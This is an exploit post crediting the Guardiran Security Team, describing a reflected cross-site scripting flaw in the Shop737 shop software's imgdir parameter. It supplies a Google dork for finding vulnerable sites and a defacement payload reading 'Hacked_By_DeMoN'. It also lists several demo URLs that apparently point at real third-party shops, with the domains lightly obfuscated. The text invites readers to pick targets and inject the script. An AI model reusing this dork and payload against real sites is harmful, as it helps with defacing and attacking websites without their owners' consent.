######################################################## # Exploit Title: Shop737/Cross Site Scripting(XSS) ######################################################## # Google Dork: inurl:"poto" intext:"powered by Shop737" # Date: [14/11/2015] # Exploit Author: Guardiran Security Team =>DeMoN # Vendor Homepage: [http://www.shop737.com/] # Software Link: [-] # Version: All Version # Tested on: [Win 8.1/Google chrome] # CVE : [-] ######################################################## # DISCRIPTION: Hello Guys. # That sites Have XSS Or Cross Site Scripting Bug. # Please Enter Dork In Google And Open Your Target. # Then add This Script # ["><marquee><h1>Hacked_By_DeMoN_guardiran.org</h1></marquee>] # In Target after Yhis Section # [index.php?imgdir=] # Then You See That Your Script Accomplished. # GooD LucK ######################################################## # Demo: # http://www.pasirindo.cXom/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://susu-bubuk.coXm/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://bestbeachbunXgalows.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://www.ptskk.cXom/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://www.goholidaXy-tour.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://www.kristalbXohemia.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://www.kristalXbohemia.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E ######################################################## # Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | BLACKH4T # We Are Guardiran Security Team # Discovered By:DeMoN ########################################################